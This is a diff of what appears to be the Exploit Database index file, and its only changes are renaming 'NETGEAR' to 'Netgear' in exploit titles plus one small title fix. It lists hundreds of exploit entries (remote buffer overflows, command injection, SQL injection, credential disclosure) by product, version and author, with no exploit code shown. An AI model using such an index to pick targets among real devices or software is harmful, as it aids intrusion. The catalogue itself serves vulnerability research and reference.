40758,exploits/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow (Metasploit)",2016-11-14,Metasploit,remote,windows, 40734,exploits/hardware/remote/40734.sh,"MOVISTAR BHS_RTA ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40735,exploits/hardware/remote/40735.txt,"D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, -40736,exploits/hardware/remote/40736.txt,"NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, -40737,exploits/hardware/remote/40737.sh,"NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40736,exploits/hardware/remote/40736.txt,"Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, +40737,exploits/hardware/remote/40737.sh,"Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40738,exploits/hardware/remote/40738.sh,"PLANET ADSL Router AND-4101 - Remote File Disclosure",2016-11-08,"Todor Donev",remote,hardware, 40740,exploits/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,remote,linux_mips,7547 40767,exploits/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,remote,windows, @@ -17517,7 +17518,7 @@ id,file,description,date,author,type,platform,port 40916,exploits/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",remote,linux, 40920,exploits/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",remote,linux, 40930,exploits/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,remote,osx, -40949,exploits/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80 +40949,exploits/cgi/remote/40949.rb,"Netgear WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",remote,cgi,80 40963,exploits/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",remote,linux,22 40984,exploits/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",remote,windows, 40990,exploits/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",remote,windows, @@ -17545,7 +17546,7 @@ id,file,description,date,author,type,platform,port 41511,exploits/windows/remote/41511.py,"FTPShell Client 6.53 - Remote Buffer Overflow",2017-03-04,"Peter Baris",remote,windows, 41545,exploits/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Remote Buffer Overflow",2017-03-07,"Peter Baris",remote,windows, 41592,exploits/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,remote,windows, -41598,exploits/cgi/remote/41598.rb,"NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80 +41598,exploits/cgi/remote/41598.rb,"Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)",2017-03-13,Metasploit,remote,cgi,80 41613,exploits/windows/remote/41613.rb,"IBM WebSphere - RCE Java Deserialization (Metasploit)",2017-03-15,Metasploit,remote,windows,8800 41614,exploits/multiple/remote/41614.rb,"Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit)",2017-03-15,Metasploit,remote,multiple,8080 43353,exploits/android/remote/43353.py,"Outlook for Android - Attachment Download Directory Traversal",2017-12-18,"Google Security Research",remote,android, @@ -17636,7 +17637,7 @@ id,file,description,date,author,type,platform,port 41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64, 42287,exploits/android/remote/42287.txt,"eVestigator Forensic PenTester - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, 41718,exploits/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",remote,hardware, -41719,exploits/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 +41719,exploits/hardware/remote/41719.rb,"Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)",2017-03-24,"Pedro Ribeiro",remote,hardware,80 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python, 41738,exploits/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow",2017-03-27,"Zhiniang Peng & Chen Wu",remote,windows, 41740,exploits/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",remote,multiple, @@ -17694,7 +17695,7 @@ id,file,description,date,author,type,platform,port 42186,exploits/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",remote,windows, 42222,exploits/windows/remote/42222.py,"SpyCamLizard 1.230 - Remote Buffer Overflow",2017-06-20,abatchy17,remote,windows, 42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443 -42257,exploits/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80 +42257,exploits/cgi/remote/42257.rb,"Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,remote,cgi,80 42282,exploits/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,remote,windows,10000 42283,exploits/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,remote,java, 42288,exploits/android/remote/42288.txt,"BestSafe Browser - Man In The Middle Remote Code Execution",2017-06-30,intern0t,remote,android, @@ -17820,7 +17821,7 @@ id,file,description,date,author,type,platform,port 44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php, 44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php, 44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android, -44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 +44245,exploits/hardware/remote/44245.rb,"Netgear - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23 44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware, 44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple, 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, @@ -20763,7 +20764,7 @@ id,file,description,date,author,type,platform,port 5062,exploits/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - 'id' SQL Injection",2008-02-05,you_kn0w,webapps,php, 5064,exploits/php/webapps/5064.txt,"All Club CMS 0.0.2 - 'index.php' SQL Injection",2008-02-05,ka0x,webapps,php, 5065,exploits/php/webapps/5065.txt,"PhotoKorn Gallery 1.543 - 'pic' SQL Injection",2008-02-05,you_kn0w,webapps,php, -5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",webapps,php, +5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php, 5068,exploits/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusions",2008-02-06,Trancek,webapps,php, 5070,exploits/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - 'private.php' SQL Injection (1)",2008-02-06,F,webapps,php, 5071,exploits/php/webapps/5071.txt,"Astanda Directory Project 1.2 - 'link_id' SQL Injection",2008-02-06,you_kn0w,webapps,php, @@ -27356,7 +27357,7 @@ id,file,description,date,author,type,platform,port 17871,exploits/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",webapps,hardware, 17872,exploits/php/webapps/17872.txt,"Multiple WordPress Plugins - 'timthumb.php' File Upload",2011-09-19,"Ben Schmidt",webapps,php, 17873,exploits/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)",2011-09-20,"Nicolas Gregoire",webapps,windows, -17874,exploits/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware, +17874,exploits/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",webapps,hardware, 17882,exploits/php/webapps/17882.php,"JAKCMS PRO 2.2.5 - Arbitrary File Upload",2011-09-22,EgiX,webapps,php, 17887,exploits/php/webapps/17887.txt,"WordPress Plugin Link Library 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php, 17888,exploits/php/webapps/17888.txt,"WordPress Plugin AdRotate 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",webapps,php, @@ -29334,7 +29335,7 @@ id,file,description,date,author,type,platform,port 24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php, 24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x Comment Module - 'CM_pid' Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php, 24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",webapps,windows, -24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware, +24441,exploits/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware, 24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,webapps,php, 24433,exploits/php/webapps/24433.txt,"PHP weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,webapps,php, 24435,exploits/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,webapps,hardware, @@ -29352,7 +29353,7 @@ id,file,description,date,author,type,platform,port 24456,exploits/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,webapps,php, 24457,exploits/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,webapps,php, 24462,exploits/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,webapps,php, -24464,exploits/hardware/webapps/24464.txt,"NETGEAR DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware, +24464,exploits/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,webapps,hardware, 24465,exploits/php/webapps/24465.txt,"CubeCart 5.2.0 - 'cubecart.class.php' PHP Object Injection",2013-02-07,EgiX,webapps,php, 24466,exploits/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,webapps,hardware, 24510,exploits/php/webapps/24510.txt,"Scripts Genie Domain Trader - 'catalog.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, @@ -29379,7 +29380,7 @@ id,file,description,date,author,type,platform,port 24506,exploits/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,webapps,php, 24507,exploits/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",webapps,php, 24512,exploits/php/webapps/24512.txt,"Scripts Genie Top Sites - 'out.php?id' SQL Injection",2013-02-17,3spi0n,webapps,php, -24513,exploits/hardware/webapps/24513.txt,"NETGEAR DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware, +24513,exploits/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,webapps,hardware, 24514,exploits/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,webapps,php, 24515,exploits/php/webapps/24515.txt,"Cometchat Application - Multiple Vulnerabilities",2013-02-18,z3r0sPlOiT,webapps,php, 24516,exploits/php/webapps/24516.txt,"Scripts Genie Hot Scripts Clone - 'showcategory.php?cid' SQL Injection",2013-02-18,"Easy Laster",webapps,php, @@ -29580,7 +29581,7 @@ id,file,description,date,author,type,platform,port 24913,exploits/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",webapps,php, 24914,exploits/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",webapps,php, 24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple, -24916,exploits/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware, +24916,exploits/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware, 24924,exploits/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",webapps,hardware, 24926,exploits/hardware/webapps/24926.txt,"D-Link - Multiple Vulnerabilities",2013-04-08,m-1-k-3,webapps,hardware, 24927,exploits/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,webapps,php, @@ -30292,12 +30293,12 @@ id,file,description,date,author,type,platform,port 25964,exploits/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",webapps,php, 25965,exploits/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,webapps,asp, 25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware, -25969,exploits/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware, +25969,exploits/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",webapps,hardware, 25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion",2013-06-05,"CWH Underground",webapps,php, 25973,exploits/php/webapps/25973.txt,"Ruubikcms 1.1.1 - 'tinybrowser.php?folder' Directory Traversal",2013-06-05,expl0i13r,webapps,php, 25976,exploits/hardware/webapps/25976.txt,"DS3 Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,hardware, 25977,exploits/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",webapps,jsp, -25978,exploits/hardware/webapps/25978.txt,"NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80 +25978,exploits/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",webapps,hardware,80 25981,exploits/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injections",2005-07-13,"Soroush Dalili",webapps,asp, 25982,exploits/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - 'Forum.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, 25983,exploits/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - 'User.cfm' Cross-Site Scripting",2005-07-14,rUnViRuS,webapps,cfm, @@ -31679,7 +31680,7 @@ id,file,description,date,author,type,platform,port 27855,exploits/php/webapps/27855.txt,"Vizra - 'A_Login.php' Cross-Site Scripting",2006-05-11,R00TT3R,webapps,php, 27857,exploits/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,webapps,php, 27773,exploits/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",webapps,php, -27774,exploits/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware, +27774,exploits/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",webapps,hardware, 27776,exploits/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,webapps,linux,443 27777,exploits/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",webapps,windows, 27779,exploits/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],webapps,php, @@ -33577,7 +33578,7 @@ id,file,description,date,author,type,platform,port 32394,exploits/asp/webapps/32394.txt,"Sama Educational Management System - 'error.asp' Cross-Site Scripting",2008-09-18,Lagon666,webapps,asp, 32392,exploits/php/webapps/32392.pl,"Add a link 4 - Security Bypass / SQL Injection",2008-09-17,JosS,webapps,php, 32388,exploits/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",webapps,php, -33984,exploits/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware, +33984,exploits/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,webapps,hardware, 30581,exploits/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,webapps,php, 30583,exploits/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,webapps,php, 30585,exploits/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",webapps,cgi, @@ -34241,7 +34242,7 @@ id,file,description,date,author,type,platform,port 31611,exploits/php/webapps/31611.txt,"RobotStats 0.1 - 'robotstats.inc.php?DOCUMENT_ROOT' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, 31614,exploits/php/webapps/31614.txt,"Tiny Portal 1.0 - 'shouts' Cross-Site Scripting",2008-04-04,Y433r,webapps,php, 31616,exploits/php/webapps/31616.txt,"Web Server Creator 0.1 - 'langfile' Remote File Inclusion",2008-04-04,ZoRLu,webapps,php, -31617,exploits/hardware/webapps/31617.txt,"NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware, +31617,exploits/hardware/webapps/31617.txt,"Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities",2014-02-12,"Andrew Horton",webapps,hardware, 31618,exploits/ios/webapps/31618.txt,"jDisk (stickto) 2.0.3 iOS - Multiple Vulnerabilities",2014-02-12,Vulnerability-Lab,webapps,ios, 31621,exploits/java/webapps/31621.txt,"Sun Java System Messenger Express 6.1-13-15 - 'sid' Cross-Site Scripting",2008-04-07,syniack,webapps,java, 31622,exploits/php/webapps/31622.txt,"URLStreet 1.0 - 'seeurl.php' Multiple Cross-Site Scripting Vulnerabilities",2008-04-07,ZoRLu,webapps,php, @@ -35020,7 +35021,7 @@ id,file,description,date,author,type,platform,port 32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php, 32880,exploits/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Cross-Site Scripting",2009-03-31,TEAMELITE,webapps,php, 32882,exploits/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",webapps,asp, -32883,exploits/hardware/webapps/32883.txt,"NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080 +32883,exploits/hardware/webapps/32883.txt,"Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",webapps,hardware,8080 32886,exploits/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",webapps,hardware,8080 32888,exploits/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 - SQL Injection / Cross-Site Scripting",2009-04-02,"Patrick Webster",webapps,asp, 32889,exploits/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,webapps,php, @@ -35140,7 +35141,7 @@ id,file,description,date,author,type,platform,port 33132,exploits/php/webapps/33132.txt,"Softbiz Dating Script 1.0 - 'cat_products.php' SQL Injection",2009-07-30,MizoZ,webapps,php, 33136,exploits/hardware/webapps/33136.txt,"Fritz!Box - Remote Command Execution",2014-05-01,0x4148,webapps,hardware, 33340,exploits/php/webapps/33340.txt,"CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",webapps,php, -33138,exploits/hardware/webapps/33138.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware, +33138,exploits/hardware/webapps/33138.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting",2014-05-01,"Dolev Farhi",webapps,hardware, 33144,exploits/php/webapps/33144.txt,"Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2009-06-29,mark99,webapps,php, 33146,exploits/php/webapps/33146.txt,"CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection",2009-08-04,"Ryan Dewhurst",webapps,php, 33147,exploits/php/webapps/33147.txt,"AJ Auction Pro 3.0 - 'txtkeyword' Cross-Site Scripting",2009-08-05,"599eme Man",webapps,php, @@ -35668,7 +35669,7 @@ id,file,description,date,author,type,platform,port 34127,exploits/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,webapps,php, 34128,exploits/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",webapps,hardware,80 34161,exploits/php/webapps/34161.txt,"WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities",2014-07-24,"Claudio Viviani",webapps,php,80 -34149,exploits/hardware/webapps/34149.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware, +34149,exploits/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",webapps,hardware, 34159,exploits/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,webapps,php, 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware, 34165,exploits/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",webapps,multiple, @@ -36418,7 +36419,7 @@ id,file,description,date,author,type,platform,port 35381,exploits/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",webapps,php,80 35323,exploits/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",webapps,php, 35324,exploits/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",webapps,php, -35325,exploits/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware, +35325,exploits/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,webapps,hardware, 35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",webapps,php, 35328,exploits/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",webapps,php, 35329,exploits/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,webapps,php, @@ -37973,7 +37974,7 @@ id,file,description,date,author,type,platform,port 37713,exploits/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,webapps,php,80 37714,exploits/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,webapps,php,80 37715,exploits/php/webapps/37715.txt,"Tendoo CMS 1.3 - Cross-Site Scripting",2015-07-29,"Arash Khazaei",webapps,php,80 -37720,exploits/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware, +37720,exploits/hardware/webapps/37720.py,"Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,webapps,hardware, 37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php, 37726,exploits/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",webapps,php,80 37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80 @@ -38151,7 +38152,7 @@ id,file,description,date,author,type,platform,port 38101,exploits/php/webapps/38101.txt,"WordPress Plugin Zingiri Forums - 'language' Local File Inclusion",2012-12-30,Amirh03in,webapps,php, 38102,exploits/php/webapps/38102.txt,"WordPress Theme Nest - 'codigo' SQL Injection",2012-12-04,"Ashiyane Digital Security Team",webapps,php, 38103,exploits/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' SQL Injection",2012-12-04,AkaStep,webapps,php, -38097,exploits/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80 +38097,exploits/hardware/webapps/38097.txt,"Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",webapps,hardware,80 38098,exploits/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,webapps,jsp,8081 38105,exploits/php/webapps/38105.txt,"WordPress Theme White-Label Framework 2.0.6 - Cross-Site Scripting",2015-09-08,Outlasted,webapps,php,80 38110,exploits/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",webapps,php, @@ -38327,7 +38328,7 @@ id,file,description,date,author,type,platform,port 38445,exploits/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",webapps,php, 38446,exploits/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,webapps,php, 38448,exploits/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",webapps,hardware, 